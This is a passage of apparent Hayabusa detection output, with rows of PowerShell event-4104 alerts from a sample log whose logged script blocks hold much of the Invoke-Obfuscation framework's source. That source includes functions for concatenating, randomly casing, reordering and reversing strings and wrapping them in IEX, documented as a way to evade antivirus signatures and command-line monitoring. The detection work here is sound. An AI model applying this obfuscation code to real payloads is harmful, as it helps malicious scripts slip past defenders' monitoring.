""String ""+""to be ""+""co""+""n""+""c""+""aten""+""at""+""ed .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'CommandArgument' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $InputVal, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [Char] $Quote ) # Strip leading and trailing single- or double-quotes if there are no more quotes of the same kind in $InputVal. # E.g. 'stringtoconcat' will have the leading and trailing quotes removed and will use $Quote. # But a string ""'G'+'"" passed to this function as 'G'+' will have all quotes remain as part of the $InputVal string. If($InputVal.Contains(""'"")) {$InputVal = $InputVal.Replace(""'"",""`'"")} If($InputVal.Contains('""')) {$InputVal = $InputVal.Replace('""','`""')} # Do nothing if string is of length 2 or less $ObfuscatedToken = '' If($InputVal.Length -le 2) { $ObfuscatedToken = $Quote + $InputVal + $Quote Return $ObfuscatedToken } # Choose a random percentage of characters to have concatenated in current token. # If the current token is greater than 1000 characters (as in SecureString or Base64 strings) then set $ConcatPercent much lower If($InputVal.Length -gt 25000) { $ConcatPercent = Get-Random -Minimum 0.05 -Maximum 0.10 } ElseIf($InputVal.Length -gt 1000) { $ConcatPercent = Get-Random -Minimum 2 -Maximum 4 } Else { $ConcatPercent = Get-Random -Minimum 15 -Maximum 30 } # Convert $ConcatPercent to the exact number of characters to concatenate in the current token. $ConcatCount = [Int]($InputVal.Length*($ConcatPercent/100)) # Guarantee that at least one concatenation will occur. If($ConcatCount -eq 0) { $ConcatCount = 1 } # Select random indexes on which to concatenate. $CharIndexesToConcat = (Get-Random -InputObject (1..($InputVal.Length-1)) -Count $ConcatCount) | Sort-Object # Perform inline concatenation. $LastIndex = 0 ForEach($IndexToObfuscate in $CharIndexesToConcat) { # Extract substring to concatenate with $ObfuscatedToken. $SubString = $InputVal.SubString($LastIndex,$IndexToObfuscate-$LastIndex) # Concatenate with quotes and addition operator. $ObfuscatedToken += $SubString + $Quote + ""+"" + $Quote $LastIndex = $IndexToObfuscate } # Add final substring. $ObfuscatedToken += $InputVal.SubString($LastIndex) $ObfuscatedToken += $FinalSubString # Add final quotes if necessary. If(!($ObfuscatedToken.StartsWith($Quote) -AND $ObfuscatedToken.EndsWith($Quote))) { $ObfuscatedToken = $Quote + $ObfuscatedToken + $Quote } # Remove any existing leading or trailing empty string concatenation. If($ObfuscatedToken.StartsWith(""''+"")) { $ObfuscatedToken = $ObfuscatedToken.SubString(3) } If($ObfuscatedToken.EndsWith(""+''"")) { $ObfuscatedToken = $ObfuscatedToken.SubString(0,$ObfuscatedToken.Length-3) } Return $ObfuscatedToken } Function Out-RandomCase { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any string or char[] by randomizing its case. Invoke-Obfuscation Function: Out-RandomCase Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RandomCase obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER InputValStr Specifies the string to obfuscate. .PARAMETER InputVal Specifies the char[] to obfuscate. .EXAMPLE C:\PS> Out-RandomCase ""String to have case randomized"" STrINg to haVe caSe RAnDoMIzeD C:\PS> Out-RandomCase ([char[]]""String to have case randomized"") StrING TO HavE CASE randOmIzeD .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'Command' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding( DefaultParameterSetName = 'InputVal')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'InputValStr')] [ValidateNotNullOrEmpty()] [String] $InputValStr, [Parameter(Position = 0, ParameterSetName = 'InputVal')] [ValidateNotNullOrEmpty()] [Char[]] $InputVal ) If($PSBoundParameters['InputValStr']) { # Convert string to char array for easier manipulation. $InputVal = [Char[]]$InputValStr } # Randomly convert each character to upper- or lower-case. $OutputVal = ($InputVal | ForEach-Object {If((Get-Random -Minimum 0 -Maximum 2) -eq 0) {([String]$_).ToUpper()} Else {([String]$_).ToLower()}}) -Join '' Return $OutputVal } Function Out-RandomWhitespace { <# .SYNOPSIS Obfuscates operator/groupstart/groupend/statementseparator token by adding random amounts of whitespace before/after the token depending on the token value and its immediate surroundings in the input script. Invoke-Obfuscation Function: Out-RandomWhitespace Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RandomWhitespace adds random whitespace before/after a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Tokens Specifies the token array containing the token we will obfuscate. .PARAMETER Index Specifies the index of the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""Write-Host ('Hel'+'lo Wo'+'rld!') -ForegroundColor Green; Write-Host ('Obfu'+'scation Ro'+'cks!') -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {If(($Tokens[$i].Type -eq 'Operator') -OR ($Tokens[$i].Type -eq 'GroupStart') -OR ($Tokens[$i].Type -eq 'GroupEnd')) {$ScriptString = Out-RandomWhitespace $ScriptString $Tokens $i}} C:\PS> $ScriptString Write-Host ('Hel'+ 'lo Wo' + 'rld!') -ForegroundColor Green; Write-Host ( 'Obfu' +'scation Ro' + 'cks!') -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host ('Hel'+'lo Wo'+'rld!') -ForegroundColor Green; Write-Host ('Obfu'+'scation Ro'+'cks!') -ForegroundColor Green} 'RandomWhitespace' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken[]] $Tokens, [Parameter(Position = 2, Mandatory = $True)] [ValidateNotNullOrEmpty()] [Int] $Index ) $Token = $Tokens[$Index] $ObfuscatedToken = $Token.Content # Do not add DEFAULT setting in below Switch block. Switch($Token.Content) { '(' {$ObfuscatedToken = $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} ')' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken} ';' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '|' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '+' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '=' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '&' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '.' { # Retrieve character in script immediately preceding the current token If($Index -eq 0) {$PrevChar = ' '} Else {$PrevChar = $ScriptString.SubString($Token.Start-1,1)} # Only add randomized whitespace to . if it is acting as a standalone invoke operator (either at the beginning of the script or immediately preceded by ; or whitespace) If(($PrevChar -eq ' ') -OR ($PrevChar -eq ';')) {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} } } # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-RemoveComments { <# .SYNOPSIS Obfuscates variable token by removing all comment tokens. This is primarily since A/V uses strings in comments as part of many of their signatures for well known PowerShell scripts like Invoke-Mimikatz. Invoke-Obfuscation Function: Out-RemoveComments Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RemoveComments obfuscates a given token by removing all comment tokens from the provided PowerShell script to evade detection by simple IOCs or A/V signatures based on strings in PowerShell script comments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""`$Message1 = 'Hello World!'; Write-Host `$Message1 -ForegroundColor Green; `$Message2 = 'Obfuscation Rocks!'; Write-Host `$Message2 -ForegroundColor Green #COMMENT"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Comment'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-RemoveComments $ScriptString $Token} C:\PS> $ScriptString $Message1 = 'Hello World!'; Write-Host $Message1 -ForegroundColor Green; $Message2 = 'Obfuscation Rocks!'; Write-Host $Message2 -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {$Message1 = 'Hello World!'; Write-Host $Message1 -ForegroundColor Green; $Message2 = 'Obfuscation Rocks!'; Write-Host $Message2 -ForegroundColor Green #COMMENT} 'Comment' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # Remove current Comment token. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.249 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-ObfuscatedStringCommand { <# .SYNOPSIS Master function that orchestrates the application of all string-based obfuscation functions to provided PowerShell script. Invoke-Obfuscation Function: Out-ObfuscatedStringCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-EncapsulatedInvokeExpression (located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedStringCommand orchestrates the application of all string-based obfuscation functions (casting ENTIRE command to a string a performing string obfuscation functions) to provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $ObfuscationLevel is defined then Out-ObfuscatedStringCommand will automatically choose a random obfuscation level. The available ObfuscationLevel/function mappings are: 1 --> Out-StringDelimitedAndConcatenated 2 --> Out-StringDelimitedConcatenatedAndReordered 3 --> Out-StringReversed .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER ObfuscationLevel (Optional) Specifies the obfuscation level for the given input PowerShell payload. If not defined then Out-ObfuscatedStringCommand will automatically choose a random obfuscation level. The available ObfuscationLevel/function mappings are: 1 --> Out-StringDelimitedAndConcatenated 2 --> Out-StringDelimitedConcatenatedAndReordered 3 --> Out-StringReversed .EXAMPLE C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 1 IEX ((('Write-H'+'ost x'+'lcHello'+' Wor'+'ld!xlc -F'+'oregroundC'+'o'+'lor Gre'+'en'+'; Write-Host '+'xlcObf'+'u'+'sc'+'ation '+'Rocks!xl'+'c'+' '+'-'+'Foregrou'+'nd'+'C'+'olor Green') -Replace 'xlc',[Char]39) ) C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 2 IEX( ((""{17}{1}{6}{19}{14}{3}{5}{13}{16}{11}{20}{15}{10}{12}{2}{4}{8}{18}{7}{9}{0}"" -f ' Green','-H',' ',' ','R','-Foregr','ost qR9He','!qR9 -Foregr','o','oundColor','catio',' ','n','oundColor','qR9','bfus',' Green; Write-Host','Write','cks','llo World!','qR9O')).Replace('qR9',[String][Char]39)) C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 3 $I4 =""noisserpxE-ekovnI|)93]rahC[]gnirtS[,'1Yp'(ecalpeR.)'ne'+'erG roloCd'+'nuo'+'rgero'+'F- 1'+'Y'+'p!s'+'kcoR'+' noit'+'a'+'cs'+'ufbO'+'1'+'Yp '+'tsoH'+'-etirW'+' ;'+'neer'+'G '+'rol'+'oCdnu'+'orger'+'o'+'F'+'-'+' 1'+'Yp'+'!dlroW '+'olleH1Yp '+'t'+'s'+'oH-et'+'irW'( "" ;$I4[ -1 ..- ($I4.Length ) ] -Join '' | Invoke-Expression .NOTES Out-ObfuscatedStringCommand orchestrates the application of all string-based obfuscation functions (casting ENTIRE command to a string a performing string obfuscation functions) to provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $ObfuscationLevel is defined then Out-ObfuscatedStringCommand will automatically choose a random obfuscation level. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding( DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [ValidateSet('1', '2', '3')] [Parameter(Position = 1)] [ValidateNotNullOrEmpty()] [Int] $ObfuscationLevel = (Get-Random -Input @(1..3)) # Default to random obfuscation level if $ObfuscationLevel isn't defined ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-StringDelimitedAndConcatenated $ScriptString} 2 {$ScriptString = Out-StringDelimitedConcatenatedAndReordered $ScriptString} 3 {$ScriptString = Out-StringReversed $ScriptString} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for String Obfuscation.""; Exit} } Return $ScriptString } Function Out-StringDelimitedAndConcatenated { <# .SYNOPSIS Generates delimited and concatenated version of input PowerShell command. Invoke-Obfuscation Function: Out-StringDelimitedAndConcatenated Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ConcatenatedString (located in Out-ObfuscatedTokenCommand.ps1), Out-EncapsulatedInvokeExpression (located in Out-ObfuscatedStringCommand.ps1), Out-RandomCase (located in Out-ObfuscatedToken.ps1) Optional Dependencies: None .DESCRIPTION Out-StringDelimitedAndConcatenated delimits and concatenates an input PowerShell command. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER PassThru (Optional) Outputs the option to not encapsulate the result in an invocation command. .EXAMPLE C:\PS> Out-StringDelimitedAndConcatenated ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" (('Write-Ho'+'s'+'t'+' {'+'0'+'}'+'Hell'+'o Wor'+'l'+'d!'+'{'+'0'+'} -Foreground'+'Color G'+'ree'+'n; Writ'+'e-'+'H'+'ost {0}Obf'+'usc'+'a'+'tion R'+'o'+'ck'+'s!{'+'0} -Fo'+'reg'+'ro'+'undColor'+' '+'Gree'+'n')-F[Char]39) | Invoke-Expression .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Switch] $PassThru ) # Characters we will substitute (in random order) with randomly generated delimiters. $CharsToReplace = @('$','|','`','\','""',""'"") $CharsToReplace = (Get-Random -Input $CharsToReplace -Count $CharsToReplace.Count) # If $ScriptString does not contain any characters in $CharsToReplace then simply return as is. $ContainsCharsToReplace = $FALSE ForEach($CharToReplace in $CharsToReplace) { If($ScriptString.Contains($CharToReplace)) { $ContainsCharsToReplace = $TRUE Break } } If(!$ContainsCharsToReplace) { # Concatenate $ScriptString as a string and then encapsulate with parentheses. $ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' If(!$PSBoundParameters['PassThru']) { # Encapsulate in necessary IEX/Invoke-Expression(s). $ScriptString = Out-EncapsulatedInvokeExpression $ScriptString } Return $ScriptString } # Characters we will use to generate random delimiters to replace the above characters. # For simplicity do NOT include single- or double-quotes in this array. $CharsToReplaceWith = @(0..9) $CharsToReplaceWith += @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $CharsToReplaceWith += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') $DelimiterLength = 3 # Multi-dimensional table containing delimiter/replacement key pairs for building final command to reverse substitutions. $DelimiterTable = @() # Iterate through and replace each character in $CharsToReplace in $ScriptString with randomly generated delimiters. ForEach($CharToReplace in $CharsToReplace) { If($ScriptString.Contains($CharToReplace)) { # Create random delimiter of length $DelimiterLength with characters from $CharsToReplaceWith. If($CharsToReplaceWith.Count -lt $DelimiterLength) {$DelimiterLength = $CharsToReplaceWith.Count} $Delim = (Get-Random -Input $CharsToReplaceWith -Count $DelimiterLength) -Join '' # Keep generating random delimiters until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($Delim.ToLower())) { $Delim = (Get-Random -Input $CharsToReplaceWith -Count $DelimiterLength) -Join '' If($DelimiterLength -lt $CharsToReplaceWith.Count) { $DelimiterLength++ } } # Add current delimiter/replacement key pair for building final command to reverse substitutions. $DelimiterTable += , @($Delim,$CharToReplace) # Replace current character to replace with the generated delimiter $ScriptString = $ScriptString.Replace($CharToReplace,$Delim) } } # Add random quotes to delimiters in $DelimiterTable. $DelimiterTableWithQuotes = @() ForEach($DelimiterArray in $DelimiterTable) { $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] # Randomly choose between a single quote and double quote. $RandomQuote = Get-Random -InputObject @(""'"",""`"""") # Make sure $RandomQuote is opposite of $OriginalChar contents if it is a single- or double-quote. If($OriginalChar -eq ""'"") {$RandomQuote = '""'} Else {$RandomQuote = ""'""} # Add quotes. $Delimiter = $RandomQuote + $Delimiter + $RandomQuote $OriginalChar = $RandomQuote + $OriginalChar + $RandomQuote # Add random quotes to delimiters in $DelimiterTable. $DelimiterTableWithQuotes += , @($Delimiter,$OriginalChar) } # Reverse the delimiters when building back out the reversing command. [Array]::Reverse($DelimiterTable) # Select random method for building command to reverse the above substitutions to execute the original command. # Avoid using the -f format operator (switch option 3) if curly braces are found in $ScriptString. If(($ScriptString.Contains('{')) -AND ($ScriptString.Contains('}'))) { $RandomInput = Get-Random -Input (1..2) } Else { $RandomInput = Get-Random -Input (1..3) } # Randomize the case of selected variable syntaxes. $StringStr = Out-RandomCase 'string' $CharStr = Out-RandomCase 'char' $ReplaceStr = Out-RandomCase 'replace' $CReplaceStr = Out-RandomCase 'creplace' Switch($RandomInput) { 1 { # 1) .Replace $ScriptString = ""'"" + $ScriptString + ""'"" $ReversingCommand = """" ForEach($DelimiterArray in $DelimiterTableWithQuotes) { $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] # Randomly decide if $OriginalChar will be displayed in ASCII representation or plaintext in $ReversingCommand. # This is to allow for simpler string manipulation on the command line. # Place priority on handling if $OriginalChar is a single- and double-quote. If($OriginalChar[1] -eq ""'"") { $OriginalChar = ""[$StringStr][$CharStr]39"" $Delimiter = ""'"" + $Delimiter.SubString(1,$Delimiter.Length-2) + ""'"" } ElseIf($OriginalChar[1] -eq '""') { $OriginalChar = ""[$StringStr][$CharStr]34"" } Else { If(Get-Random -Input (0..1)) { $OriginalChar = ""[$StringStr][$CharStr]"" + [Int][Char]$OriginalChar[1] } } # Randomly select if $Delimiter will be displayed in ASCII representation instead of plaintext in $ReversingCommand. If(Get-Random -Input (0..1)) { # Convert $Delimiter string into a concatenation of [Char] representations of each characters. # This is to avoid redundant replacement of single quotes if this function is run numerous times back-to-back. $DelimiterCharSyntax = """" For($i=1; $i -lt $Delimiter.Length-1; $i++) { $DelimiterCharSyntax += ""[$CharStr]"" + [Int][Char]$Delimiter[$i] + '+' } $Delimiter = '(' + $DelimiterCharSyntax.Trim('+') + ')' } # Add reversing commands to $ReversingCommand. $ReversingCommand = "".$ReplaceStr($Delimiter,$OriginalChar)"" + $ReversingCommand } # Concatenate $ScriptString as a string and then encapsulate with parentheses. $ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' # Add reversing commands to $ScriptString. $ScriptString = $ScriptString + $ReversingCommand } 2 { # 2) -Replace/-CReplace $ScriptString = ""'"" + $ScriptString + ""'"" $ReversingCommand = """" ForEach($DelimiterArray in $DelimiterTableWithQuotes) { $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] # Randomly decide if $OriginalChar will be displayed in ASCII representation or plaintext in $ReversingCommand. # This is to allow for simpler string manipulation on the command line. # Place priority on handling if $OriginalChar is a single- or double-quote. If($OriginalChar[1] -eq '""') { $OriginalChar = ""[$CharStr]34"" } ElseIf($OriginalChar[1] -eq ""'"") { $OriginalChar = ""[$CharStr]39""; $Delimiter = ""'"" + $Delimiter.SubString(1,$Delimiter.Length-2) + ""'"" } Else { $OriginalChar = ""[$CharStr]"" + [Int][Char]$OriginalChar[1] } # Randomly select if $Delimiter will be displayed in ASCII representation instead of plaintext in $ReversingCommand. If(Get-Random -Input (0..1)) { # Convert $Delimiter string into a concatenation of [Char] representations of each characters. # This is to avoid redundant replacement of single quotes if this function is run numerous times back-to-back. $DelimiterCharSyntax = """" For($i=1; $i -lt $Delimiter.Length-1; $i++) { $DelimiterCharSyntax += ""[$CharStr]"" + [Int][Char]$Delimiter[$i] + '+' } $Del",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.249 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-ObfuscatedStringCommand { <# .SYNOPSIS Master function that orchestrates the application of all string-based obfuscation functions to provided PowerShell script. Invoke-Obfuscation Function: Out-ObfuscatedStringCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-EncapsulatedInvokeExpression (located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedStringCommand orchestrates the application of all string-based obfuscation functions (casting ENTIRE command to a string a performing string obfuscation functions) to provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $ObfuscationLevel is defined then Out-ObfuscatedStringCommand will automatically choose a random obfuscation level. The available ObfuscationLevel/function mappings are: 1 --> Out-StringDelimitedAndConcatenated 2 --> Out-StringDelimitedConcatenatedAndReordered 3 --> Out-StringReversed .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER ObfuscationLevel (Optional) Specifies the obfuscation level for the given input PowerShell payload. If not defined then Out-ObfuscatedStringCommand will automatically choose a random obfuscation level. The available ObfuscationLevel/function mappings are: 1 --> Out-StringDelimitedAndConcatenated 2 --> Out-StringDelimitedConcatenatedAndReordered 3 --> Out-StringReversed .EXAMPLE C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 1 IEX ((('Write-H'+'ost x'+'lcHello'+' Wor'+'ld!xlc -F'+'oregroundC'+'o'+'lor Gre'+'en'+'; Write-Host '+'xlcObf'+'u'+'sc'+'ation '+'Rocks!xl'+'c'+' '+'-'+'Foregrou'+'nd'+'C'+'olor Green') -Replace 'xlc',[Char]39) ) C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 2 IEX( ((""{17}{1}{6}{19}{14}{3}{5}{13}{16}{11}{20}{15}{10}{12}{2}{4}{8}{18}{7}{9}{0}"" -f ' Green','-H',' ',' ','R','-Foregr','ost qR9He','!qR9 -Foregr','o','oundColor','catio',' ','n','oundColor','qR9','bfus',' Green; Write-Host','Write','cks','llo World!','qR9O')).Replace('qR9',[String][Char]39)) C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 3 $I4 =""noisserpxE-ekovnI|)93]rahC[]gnirtS[,'1Yp'(ecalpeR.)'ne'+'erG roloCd'+'nuo'+'rgero'+'F- 1'+'Y'+'p!s'+'kcoR'+' noit'+'a'+'cs'+'ufbO'+'1'+'Yp 